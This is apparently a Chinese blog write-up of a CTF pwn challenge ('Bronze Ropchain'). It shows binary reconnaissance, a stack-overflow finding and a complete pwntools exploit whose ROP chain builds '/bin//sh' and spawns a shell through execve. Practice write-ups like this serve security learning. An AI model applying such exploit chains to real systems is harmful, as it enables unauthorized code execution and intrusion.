这个题应该简单记录一下,感谢今天梦师傅的指点嘻嘻orz
因为它有点不一样
checksec
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ checksec ./bronze_ropchain
[*] '/home/kk/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain/bronze_ropchain'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
file/ldd
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ file ./bronze_ropchain
./bronze_ropchain: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=16a9964f0e243870ebccdaf50522bcee80741083, not stripped
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ldd ./bronze_ropchain
not a dynamic executable
这两个指令都可以看出是静态编译
ida
漏洞很好找啦,栈溢出
OS: 本来我看见canary开启了,我就想先leak canary,结果...不需要,因为静态编译,观察ida没有readsword(梦师傅教我的哈哈哈哈),所以并不存在canary
运行一下看看
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ./bronze_ropchain
What is your name?
kkkkk
Hello kkkkk
! How are you on this fine day?
输入不到0x400,可以发现函数支持\x0a截断
所以我们用ROPgadget找ropchain
ROPgadget --binary ./bronze_ropchain --badbytes '00|0a' --ropchain
参数badtypes指不含\x00 \x0a的ropchain
exp👇
#!usr/bin/python
from pwn import *
from struct import pack
# io = remote('chall2.2019.redpwn.net', 4004)
io = process('./bronze_ropchain')
io.recv()
p = ''
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80
payload = "a" * 0x18 + "a" * 4 + p
io.sendline(payload)
io.sendline('')
io.interactive()
网友评论